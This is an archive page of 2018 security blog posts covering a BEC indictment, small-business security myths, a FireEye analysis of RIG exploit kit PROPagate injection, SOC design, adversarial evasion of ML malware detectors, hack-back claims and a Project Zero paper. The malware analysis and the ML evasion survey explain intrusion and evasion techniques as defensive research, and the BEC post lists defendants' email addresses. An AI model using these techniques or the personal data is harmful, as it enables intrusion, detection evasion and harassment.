Monthly Archives: June 2018

Memphis BEC Scammers Arrested and At Large

The FBI announced another round of Business Email Compromise arrests this past week.  This time, a focus was in Memphis, Tennessee.  According to the Western District of Tennessee Press Release, "Eight Arrested in Africa-Based Cybercrime and Business Email Compromise Conspiracy", the individuals involved stole more than $15 Million!

The main indictment, originally filed in August 2017, charges 11 individuals with a variety of offenses related to their Business Email Compromise [BEC] crimes.


Count 1: 18 USC §1349.F - Attempt and Conspiracy to Commit Mail Fraud - penalties of up 20 years in prison and fines of up to $250,000, plus supervised release for up to 3 years.

Counts 2-8: 18 USC §1343.F - Fraud by Wire, Radio, or Television - penalties of up to 20 years in prison and fines of up to $250,000, plus supervised release for up to 3 years.

Count 9: 18 USC §§1956-4390.F - Money Laundering - Embezzlement, Other - penalties of up to 20 years in prison and fines of up to $500,000, plus supervised release for up to 3 years.

Count 10: 18 USC §371.F - Conspiracy to Defraud the United States - penalties of up to 5 years in prison and fines of up to $250,000, plus supervised release for up to 1 year.

Count 11-14: 18 USC §10288.A.F - Fraud with Identification Documents + Aggravated Identity Theft - 2 years incarceration consecutive to any other sentence imposed, plus fines of not more than $250,000.

1. Babatunde Martins (Counts 1,9,10,11)
2. Victor Daniel Fortune Okorhi (Counts 1,9,10)
3. Benard Emurhowhoariogho Okorkhi (Counts 1, 2, 3, 9, 10)
4. Maxwell Peter (Counts 1, 4, 6, 7, 8, 9, 10, 11, 14)
5. Dennis Miah - (Counts 1,9,10,11,13)
6. Sumaila Hardi Wumpini - (Counts 1,9,10)
7. Olufolajimi Abegunde (USM # 71343-019), (Counts 1,9,12)
8. Ayodeji Olumide Ojo (Counts 1,9,12)
9. Dana Brady (Counts 1,9)
10. James Dean (USM # 52637-076)  (Counts 1,9)
11. Javier Luis Ramos Alonso, 28,  (USM #24513-111) (Counts 1, 5, 9, 12)

In a separate indictment, Rashid Abdulai, was charged for much of the same, but with his key role being controlling five TD Bank accounts that were used to launder funds.

The primary victim in this case seems to be "Company A", a real estate company in Memphis, who is foolishly identified in the indictment through the carelessness of the author.  I've chosen to redact myself on that, but DAMN!  When you describe the company in such a way that there is exactly one such company on planet earth, you are failing to keep the faith of your victim companies.  Shame!

Fortunately, the indictment also shares a lot of details on the defendants:

RASHID ABDULAI, age 24
a citizen of Ghana, residing in Bronx, New York
controlled at least five TD Bank accounts

BABATUNDE MARTINS, age 62
email: papamart2000@yahoo.com
Company: Afriocean LTD
Nigerian citizen living in Ghana

VICTOR DANIEL FORTUNE OKORHI, age 35 -  *** STILL AT LARGE AND WANTED***
emails:  vicfoko@yahoo.com, VicdarycorriLTD@gmail.com, vicdarycomltd@icloud.com
Company: Vicdary Company LTD
Nigerian citizen living in Ghana

BENARD EMURHOWWHOARIOGHO OKORHI, age 39
emails: Marc.Richards@aol.com, benardokorhi@yahoo.com
Company: Coolben Royal Links LTD
Nigerian citizen living in Ghana

MAXWELL ATUGBA ABAYETA (AKA Peter Maxwell, AKA Maxwell Peter ), age 26
emails: petermaxwell200@gmail.com, sandarlin200@yahoo.com
social accounts: Facebook.com/maxwell.peter.5688
citizen of Ghana

DENNIS MIAH (aka Dennis Brown, AKA Dr. Den Brown), age 34 -  *** STILL AT LARGE AND WANTED***
 emails: JimRoyAirSeal1@yahoo.com, drdenbrown@yahoo.com
social accounts: Facebook.com/Oga.Bossson, Twitter.com/Oga.Bossson
citizen of Ghana

SUMAILA HARDI WUMPINI, age 29 - *** STILL AT LARGE AND WANTED***
email: hardi765_new@hotmail.com
social accounts: Facebook.com/Wumpini.Hardy
resident of Ghana

OLUFOLAJIMI ABEGUNDE, age 31
Nigerian citizen residing in Atlanta, Georgia

AYODEJI OLUMIDE OJO, age 35 -  *** STILL AT LARGE AND WANTED***
Nigerian citizen, lives with ABEGUNDE in Atlanta when in United States

DANA BRADY, aged 61
emails: bradydana50@gmail.com
US Citizen residing in Auburn, Washington

JAMES DEAN, aged 65
US Citizen, residing in Plainfield, Indiana

JAVIER LUIS RAMOS ALONSO, aged 28
Mexican citizen, residing in Seaside, California

D. G. -
emails: d2t2green696@gmail.com, d2t2green696@yahoo.com
US Citizen residing in Mississippi

J.R.
emails: LRIGNWM@yahoo.com
US Citizen residing in New Jersey

M.Z.
emails: CMIMIGO@aol.com
US Citizen residing in Utah

T.W. - US Citizen residing in Tennessee
J.B. - US Citizen residing in Alabama
C.M. - US Citizen residing in Tennessee (Western District)
C.W. - US Citizen residing in Tennessee
A.K. - US Citizen residing in Tennessee (Western District)
V.M. - US Citizen residing in Georgia

How It Worked

Martins, Maxwell, Bernard Okorhi, Victor Okorhi, and/or Miah would get the IP addresses of potentially vulnerable email servers and target them for intrusion.  Using US based IP addresses offered through VPN services, they would access a variety of websites, including credit card transaction processors and dating websites.  Their role in the conspiracy also included originating the spoofed emails that will be explained later.

Martins, both Okorhis, Maxwell, Miah, Wumpini, Brady, Dean, Ojo, and others would open bank accounts for receiving fraudulently-obtained funds and sending them to other accounts controlled by their co-conspirators.  

Because they had control of email accounts at Crye-Leike, they could tell when fund transfers related to real estate sales were scheduled to take place.  They would then spoof the email addresses of those involved in the transactions and send instructions causing the financial transfers to be redirected to accounts controlled by members of the conspiracy.

The funds were then laundered in a variety of ways, including using the funds to purchase goods, including construction materials, cell phones, and other electronics, and having those goods shipped to Ghana for use or resale to benefit the members of the conspiracy.

Maxwell, Miah, and both Okorhis created false identities and created dating profiles with false emails to correspond to their false dating profiles.  Through these, they lured victims into online romance scams, gold-buying scams, and a variety of advanced fee fraud scams.  These romance scam victims would carry out acts on behalf of the conspiracy, including forwarding counterfeit checks, receiving and shipping merchandice, and transferring proceeds via wire, US Mail, ocean freight, and express package delivery services.

Martins, Maxwell, Miah, and both Okorhis also purchased stolen PII, including credit card information, banking information, and IP addresses from underground forums specializing in the sale of such information.

By purchasing cell phones in the United State and activating Voice-over-IP (VOIP) accounts, the US telephone numbers could then be used by the conspirators in Africa, allowing them to appear to be making their calls in the United States.

Some of the activity in this case dates back to 2012, when MIAH was already using fraudulently purchased credit cards and remote desktop protocol (RDP) to make online purchases that appeared to be in the United States.  (Hackers compromise US computers and set them up to use RDP so that foreign criminals can use them to originate credit card purchases in places where the credit card was issued.  By having, say, a Memphis Tennessee IP address, purchases made by a Memphis Tennessee credit card do not seem as suspicious.)

Specific Acts

Some of their crimes were extremely bold.  For example:

"On or about December 13, 2016, MIAH caused construction materials to be purchased with fraudulently obtained funds, and caused a freight container of construction supplies to be sent to him in Ghana."  WHAT?!?!  That's bold!

The compromise of the email accounts at Company A was in play by June 30, 2016, when $33,495 was wired to the wrong location after a tip received from stolen emails.

In August 2016, OJO opened a new Wells Fargo bank account, after his previous account at Bank of America was shut down due to fraud.  He used ABEGUNDE's new address (presumably in Atlanta, Georgia) as the address for the new account.

He also opened a Wells Fargo account in the same address in October of 2016.

Benard Okorhi sent emails as "Marc.Richards@aol.com" directing C.M. to obtain cash advances from credit cards and send the proceeds to recipients in Ghana.  He also ordered C.M. to purchase five iPhones and ship them to Ghana.

Miah used the "DrDenBrown@yahoo.com" email to tell Okorhi (as Marc.Richards) to smooth things out on the phone with a romance scam victim, because Okorhi had a better American accent.

Some of the other interesting "acts" in the conspiracy included:

25JUL2016 - Javier Luis Ramos Alonso accepts a $154,371 wire from Company A into his Wells Fargo account ending in 7688 and then sends the funds to accounts controlled by OJO in Atlanta.

26MAY2017 - Maxwell Peters sends a WhatsApp message directing an undercover Memphis FBI agent to receive a $15,000 check on his behalf.  Ooops!

30MAY2017 - Maxwell Peters directs the FBI agent to send $5,000 of the proceeds to himself in Ghana.

02JUN2017 - Maxwell Peters directs the FBI agent to send a $15,000 check to himself in Ghana.

Although the indictment doesn't lay out more of the particular acts, the Press Release says that this group stole more than $15 Million altogether!

Some interesting images

"M.Z." has an interesting Amazon Wish List for a romance scammer involved in shipping electronics:

On December 8, 2017, Abdulai says is asked in one of his WhatsApp chats:  "Hope Maxwell case didn't put you into any problem."  He responded "FBI came to my house asking me stuff about those transactions that was coming into my account so I'm tryna stay out f this whatapp n stuff for a while cuz I feel like they tracking me."

You got that right, Abdulai!



10 Internet Security Myths that Small Businesses Should Be Aware Of

Most small businesses don’t put as much focus on internet security as they probably should. If you are a small business owner or manager, not focusing on internet security could put you in a bad spot. Are you believing the myths about internet security or are you already using best practices? Here’s a few of the most common myths…take a look to see where you truly stand:

Myth – All You Need is a Good Antivirus Program

Do you have a good antivirus program on your small business network? Do you think that’s enough? Unfortunately, it’s not. Though an antivirus program is great to have, there is a lot more that you have to do. Also, keep in mind that more people than ever are working remotely, and odds are good that they are working on a network that is not secured.

Myth – If You Have a Good Password, Your Data is Safe

Yes, a strong password is essential to keeping your information safe, but that alone is not going to do much if a hacker is able to get it somehow. Instead, setting up two-factor authentication is essential. This is much safer. Also make sure that your team doesn’t write their passwords down and keep them close to the computer or worse, use the same passwords across multiple critical accounts.

Myth – Hackers Only Target Large Businesses, So I Don’t Have to Worry

Unfortunately, many small business owners believe that hackers won’t target them because they only go after big businesses. This isn’t true, either. No one is immune to the wrath of hackers, and even if you are the only employee, you are a target.

Myth – Your IT Person Can Solve All of Your Issues

Small business owners also believe that if they have a good IT person, they don’t have to worry about cybercrime. This, too, unfortunately, is a myth. Though having a good IT person on your team is a great idea, you still won’t be fully protected. Enlist outside “penetration testers” who are white-hat hackers that seek out vulnerabilities in your networks before the criminals do.

Myth – Insurance Will Protect You from Cybercrime

Wrong! While there are actually several insurance companies that offer policies that “protect” businesses from cybercrimes, they don’t proactively protect your networks, but will provide relief in the event you are hacked. But read the fine print. Because if you are severely negligent, then all bets may be off. In fact, it is one of the strongest growing policy types in the industry.

Myth – Cyber Crimes are Overrated

Though it would certainly be nice if this was false, it’s simply not. These crimes are very real and could be very dangerous to your company. Your business is always at risk. Reports show as many as 4 billion records were stolen in 2016.

Myth – My Business is Safe as Long as I Have a Firewall

This goes along with the antivirus myth. Yes, it’s great to have a good firewall, but it won’t fully protect your company. You should have one, as they do offer a good level of protection, but you need much more to get full protection.

Myth – Cybercriminals are Always People You Don’t Know

Unfortunately, this, too, is not true. Even if it is an accident, many instances of cybercrimes can be traced back to someone on your staff. It could be an employee who is angry about something or even an innocent mistake. But, it only takes a single click to open up your network to the bad guys.

Myth – Millennials are Very Cautious About Internet Security

We often believe that Millennials are very tech-savvy; even more tech-savvy than the rest of us. Thus, we also believe that they are more cautious when it comes to security. This isn’t true, though. A Millennial is just as likely to put your business at risk than any other employee.

Myth – My Company Can Combat Cyber Criminals

You might have a false bravado about your ability to combat cybercrime. The truth is, you are probably far from prepared if you are like the majority.

These myths run rampant in the business world, so it is very important to make sure that you are fully prepared to handle cybercrime.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of Safr.me a cybersecurity speaking and consulting firm based in Massachussets. See him discussing internet and wireless security on Good Morning America.

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique

Introduction

Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.


Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.


Figure 2: Injected iframe

The landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.


Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189 which allows it to download the payload and execute it using the code snippet seen in Figure 4.


Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.


Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419 which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.


Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.


Figure 7: Call to JSON.Stringify

JavaScript 3

The third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits CVE-2018-4878, as shown in Figure 8.


Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.


Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.


Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.


Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named ‘kumar.dll’ and ‘abaram.dat’ in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

The DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the BeingDebugged flag is set, the executable terminates itself.

The malware also implements an Anti-VM check by opening the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum with value 0.

It checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen.  Each of these strings is indictative of virtual machines

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.


Figure 12: Checking integrity level of current process

If the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.

The malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791


Figure 13: Creating file mapping object name

The malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).


Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).


Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.

SetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).


Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.


Figure 17: Assembly view of injected shellcode

Analysis of Third Stage Payload

Before executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.

The first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.

The second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.

Other than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.

To remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.


Figure 18: Network communication

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.

Conclusion

Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Why Do SOCs Look Like This?

When you hear the word "SOC," or the phrase "security operations center," what image comes to mind? Do you think of analyst sitting at desks, all facing forward, towards giant screens? Why is this?

The following image is from the outstanding movie Apollo 13, a docudrama about the challenged 1970 mission to the moon.


It's a screen capture from the go for launch sequence. It shows mission control in Houston, Texas. If you'd like to see video of the actual center from 1970, check out This Is Mission Control.

Mission control looks remarkably like a SOC, doesn't it? When builders of computer security operations centers imagined what their "mission control" rooms would look like, perhaps they had Houston in mind?

Or perhaps they thought of the 1983 movie War Games?


Reality was way more boring however:


I visited NORAD under Cheyenne Mountain in 1989, I believe, when visiting the Air Force Academy as a high school senior. I can confirm it did not look like the movie depiction!

Let's return to mission control. Look at the resources available to personnel manning the mission control room. The big screens depict two main forms of data: telemetry and video of the rocket. What about the individual screens, where people sit? They are largely customized. Each station presents data or buttons specific to the role of the person sitting there. Listen to Ed Harris' character calling out the stations: booster, retro, vital, etc. For example:


This is one of the key differences between mission control and any modern computerized operations center. In the 1960s and 1970s, workstations (literally, places where people worked) had to be customized. They lacked the technology to have generic workstations where customization was done via screen, keyboard, and mouse. They also lacked the ability to display video on demand, and relied on large television screens. Personnel with specific functions sat at specific locations, because that was literally the only way they could perform their jobs.

With the advent of modern computing, every workstation is instantly customizable. There is no need to specialize. Anyone can sit anywhere, assuming computers allow one's workspace to follow their logon. In fact, modern computing allows a user to sit in spaces outside of their office. A modern mission control could be distributed.

With that in mind, what does the current version of mission control look like? Here is a picture of the modern Johnson Space Center's mission control room.



It looks similar to the 1960s-1970s version, except it's dominated by screens, keyboards, and mice.

What strikes me about every image of a "SOC" that I've ever seen is that no one is looking at the big screens. They are almost always deployed for an audience. No one in an operational role looks at them.

There are exceptions. Check out the Arizona Department of Transportation operations center.


Their "big screen" is a composite of 24 smaller screens showing traffic and roadways. No one is looking at the screen, but that sort of display is perfect for the human eye.

It's a variant of Edward Tufte's "small multiple" idea. There is no text. The eye can discern if there is a lot of traffic, or little traffic, or an accident pretty easily. It's likely more for the benefit of an audience, but it works decently well.

Compare those screens to what one is likely to encounter in a cyber SOC. In addition to a "pew pew" map and a "spinning globe of doom," it will likely look like this, from R3 Cybersecurity:


The big screens are a waste of time. No one is standing near them. No one sitting at their workstations can read what the screens show. They are purely for an audience, who can't discern what they show either.

The bottom line for this post is that if you're going to build a "SOC," don't build it based on what you've seen in the movies, or in other industries, or what a consultancy recommends. Spend some time determining your SOC's purpose, and let the workflow drive the physical setting. You may determine you don't even need a "SOC," either physically or logically, based on maturing understandings of a SOC's mission. That's a topic for a future post!

Attacking Machine Learning Detectors: the state of the art review

Machine learning (ML) is a great approach to detect Malware. It is widely used among technical community and scientific community with two different perspectives: Performance V.S Robustness. The technical community tries to improve ML performances in order to increase the usability on large scale while scientific community is focusing on robustness by meaning how easy it would be to attack a ML detector engine. Today I'd like to focus our attention a little bit on the second perspective pointing up how to attack ML detector engines.

We might start by classifying machine learning attacks in three main sets:

  1. Direct Gradient-Based Attack. The attacker needs to know the ML Model. The attacker needs to know model structure and model weights in order to make direct queries to the Machine Learning Model and figure out what is the best way to evade the it.
  2. Score Model Attack. This attack set is based on the score systems. The attacker does not know the Machine Learning Model nor its own weights but he has direct access to the detector engine so that he can probe the machine learning model. The model will return a score and based on such a score, the attacker would be able to guess how to minimise it by forcing specific and crafted inputs.
  3. Binary Black Box Attack.  The attacker has no idea about the Machine Learning Model and the applied Weights, he has also no idea about the scoring system but he have unlimited access to probe the Machine Learning Model. 
Direct Gradient-Based Attack

Direct gradient based attack could be implemented in at least two ways. A first and most used way, is to apply small changes to the original sample in order to reduce the given score. The changes must be limited to a specific domain, for example: valid Windows PE file or  valid PDF files, and so forth. The changes must be little and they should be generated in order to minimise a scoring function derived by weights (which are know fro Direct Gradient-Based Attack). A second way is to connect the targeted model (the mode which is under attack) to a generator model in a generative adversarial network (GAN). Unlike the previous set, the  GAN generator learns how to generate a complete new sample derived by a given seed able to minimise the scoring function. 

I.Goodfellow et Al. in their work "Explaining and Harnessing Adversial Examples" (here) showed how little changes targeted to minimise the resulting weights on a given sample X would be effective in ML evasion. Another great work is written by K.Grosse et Al. titles: "Adversial Perturbations against deep neural networks for malware classification" (here). The authors attacked a deep learning Android malware model, based on DREBIN Android Malware data set, by apply a imperceptible perturbation on the feature vector. They had very interesting results getting from 50% to 84% of evasion rate.   I.Goodfellow et Al. in their work titled "Generative Adversial Nets" (here) developed a GAN able to iterate a series of adversarial rounds to generate samples that were classified as "ham" from the targeted model but that really were not. The following image shows a generative adversarial nets are trained by simultaneously updating the discriminative distribution (D, blue, dashed line) so that it discriminates between samples from the data generating distribution (black,dotted line) px from those of the generative distribution pg (G) (green, solid line).

Image from: "Generative Adversial Nets"



Score Model Attack

The attacker posture on that attack set is considered as "myope". The attacker does not know exactly how the ML model works and he has no idea about how the weights changes inside the ML algorithm but he has the chances to test his sample and getting back a score so that he is able to measure the effect of the input perturbation.

W. Xu, Y. Qi and D. Evans in their work titled: "Automatically evading classifiers" (here) implemented a "fitness function" which gives a fitness score of each generated variant. A variant with a positive fitness score is evasive. The fitness score holds the logic behind the targeted model classified as benign the current sample but retains a malicious behaviour. Once the sample gets high fitness score it is used a seed into a more general genetic algorithm which starts to manipulate the seed in order to make different species. To assure that those mutations preserve the desired malicious behaviour according to the original seed the authors used an oracle. In that case they used cuckoo sandbox.

Image from: "Automatically evading classifiers"


After one week of execution the genetic algorithm found nearly more then 15k evasive variants from 500 circa malicious seeds, getting the 100% of evasion rate on PDFrate classifier.

Binary black-box attacks

Binary black-box attacks are the most general one since attacker does not know anything about the used model and the anti malware engine just says: True or False (it's a Malware or it is not a Malware). In 2017 W.Hu and Y.Tan made a great work described in "Generating Adversarial Malware Examples for Malware Classification" (here). The authors developed MalGAN an Adversial Malware generator able to generate valid PE Malware to evade static black-box PE malware engine. The idea behind MalGAN is simple. First the attacker maps the Black-Box outputs by providing specific and Known Samples (Malware and Good PE). After the mapping phase the attacker builds a Model that behaves as the black-box Model. It is a simple Model trained to behave as the targeted one. Then the built Model is used as target model in a gradient computation GAN to produce evasive Malware. The authors reported 100% efficacy in bypassing the target Model. H. S. Anderson et Al. in "Evading Machine Learning Malware Detection" (here) adopted a Reinforced Learning Approach. The following image shows the Markov decision process formulation of the malware evasion reinforcement learning problem.

Image from: Evading Machine Learning Malware Detection


The agent is the function who manipulate the sample depending on the environment state. Both the reward and a the state are used as input from the agent in order to get decisions on next actions. The agent learns by the reward which depends about the reached state. For example the reward could be higher if the reached state is close to the desired one or vice-versa. The authors use a Q-Learning technique in order to underestimate a negative reward given for an action which would be significant in medium long term.

"In our framework, the actions space A consists of a set of modifications to the PE file that (a) don’t break the PE file format, and (b) don’t alter the intended functionality of the malware sample. The reward function is measured by the anti-malware engine, which is converted to a reward: 0 if the modified malware sample is judged to be benign, and 1 if it is deemed to be malicious. The reward and state are then fed back into the agent."

Final Considerations

Machine Learning, but more generally speaking Artificial Intelligence, would be useful to detect Cyber Attacks but unfortunately - as widely proved on this post - it would not be enough per se. Attackers would use the same techniques such as Adversarial Machine learning  to evade Machine Learning detectors. Cyber Security Analysts would still play a fundamental role in Cyber Security Science and Technology for many years from now. A technology who promises to assure cyber security protection without human interaction is not going to work.



Bejtlich on the APT1 Report: No Hack Back

Before reading the rest of this post, I suggest reading Mandiant/FireEye's statement Doing Our Part -- Without Hacking Back.

I would like to add my own color to this situation.

First, at no time when I worked for Mandiant or FireEye, or afterwards, was there ever a notion that we would hack into adversary systems. During my six year tenure, we were publicly and privately a "no hack back" company. I never heard anyone talk about hack back operations. No one ever intimated we had imagery of APT1 actors taken with their own laptop cameras. No one even said that would be a good idea.

Second, I would never have testified or written, repeatedly, about our company's stance on not hacking back if I knew we secretly did otherwise. I have quit jobs because I had fundamental disagreements with company policy or practice. I worked for Mandiant from 2011 through the end of 2013, when FireEye acquired Mandiant, and stayed until last year (2017). I never considered quitting Mandiant or FireEye due to a disconnect between public statements and private conduct.

Third, I was personally involved with briefings to the press, in public and in private, concerning the APT1 report. I provided the voiceover for a 5 minute YouTube video called APT1: Exposing One of China's Cyber Espionage Units. That video was one of the most sensitive, if not the most sensitive, aspects of releasing the report. We showed the world how we could intercept adversary communications and reconstruct it. There was internal debate about whether we should do that. We decided to cover the practice in the report, as Christopher Glyer Tweeted:


In none of these briefings to the press did we show pictures or video from adversary laptops. We did show the video that we published to YouTube.

Fourth, I privately contacted former Mandiant personnel with whom I worked during the time of the APT1 report creation and distribution. Their reaction to Mr Sanger's allegations ranged from "I've never heard of that" to "completely false." I asked former Mandiant colleagues, like myself, in the event that current Mandiant or FireEye employees were told not to talk to outsiders about the case.

What do I think happened here? I agree with the theory that Mr Sanger misinterpreted the reconstructed RDP sessions for some sort of "camera access." I have no idea about the "bros" or "leather jackets" comments!

In the spirit of full disclosure, prior to publication, Mr Sanger tried to reach me to discuss his book via email. I was sick and told him I had to pass. Ellen Nakashima also contacted me; I believe she was doing research for the book. She asked a few questions about the origin of the term APT, which I answered. I do not have the book so I do not know if I am cited, or if my message was included.

The bottom line is that Mandiant and FireEye did not conduct any hack back for the APT1 report.

Update: Some of you wondered about Ellen's role. I confirmed last night that she was working on her own project.

Tuning up my WordPress Install

Dreamhost was sending me cryptic emails about my site using too many resources then dieing as a result.

Then Jetpack site monitoring was finding the site down, presumably due to running out of resources.

And the homepage loaded too slowly.

So a technical problem was at hand.

There aren’t a lot of resources out there for troubleshooting this sort of issue. GoDaddy has a long abandoned plugin that would tell you which WordPress plugins were using the most RAM. It no longer worked. The current state of site troubleshooting is to disable your plug-ins one at a time, and use another plugin to monitor site RAM usage. I found it better to start with a list of plugins known to cause excessive resource usage, and then run a speedtest at gtmetrix.com.

So I said goodbye to some plugins. The one I’ll miss the most is one that posted related posts on if you viewed a post from the single post page. Plugins like that are designed to keep eyeballs on that page. I also disabled the Better Tag cloud plugin. I liked it there in the sidebar. Tags are better than categories in my opinion. But Tag Clouds are really a think of the past. So is blogging for that matter. Yet here I am.

Jetpack is frequently a target for people trying to save resources. After reviewing the features I used, I decided to disable it.

The main thing slowing down my page, was the embedded Youtube videos. I installed WP Youtube Lyte, a plugin that now displays a screenshot of the video rather than embedding the actual video. When you click on the screen, then the video loads. If you’re on mobile, you’ll need to click twice. If you’re in a RSS reader, you’ll need to click the view on Youtube link.

Lastly, I made some changes to caching at Cloudflare following the cloudflare site settings listed in an article on W3 Total Cache and Cloudflare. I did not install W3 Total Cache. I’ll have to keep an eye on it to see if I’ve successfully enabled caching without delaying when people see my content.

When I started the front page of InfosecBlog.org was loading in 3 to 4 seconds according to gtmetrix. Its now loading in 0.6 to 1 second.

The post Tuning up my WordPress Install appeared first on Roger's Information Security Blog.

Detecting Kernel Memory Disclosure – Whitepaper

Posted by Mateusz Jurczyk, Project Zero

Since early 2017, we have been working on Bochspwn Reloaded – a piece of dynamic binary instrumentation built on top of the Bochs IA-32 software emulator, designed to identify memory disclosure vulnerabilities in operating system kernels. Over the course of the project, we successfully used it to discover and report over 70 previously unknown security issues in Windows, and more than 10 bugs in Linux. We discussed the general design of the tool at REcon Montreal and Black Hat USA in June and July last year, and followed up with the description of the latest implemented features and their results at INFILTRATE in April 2018 (click on the links for slides).

As we learned during this study, the problem of leaking uninitialized kernel memory to user space is not caused merely by simple programming errors. Instead, it is deeply rooted in the nature of the C programming language, and has been around since the very early days of privilege separation in operating systems. In an attempt to systematically outline the background of the bug class and the current state of the art, we wrote a comprehensive paper on this subject. It aims to provide an exhaustive guide to kernel infoleaks, their genesis, related prior work, means of detection and future avenues of research. While a significant portion of the document is dedicated to Bochspwn Reloaded, it also covers other methods of infoleak detection, non-memory data sinks and alternative applications of full-system instrumentation, including the evaluation of some of the ideas based on the developed prototypes and experiments performed as part of this work.

Without further ado, enjoy the read:
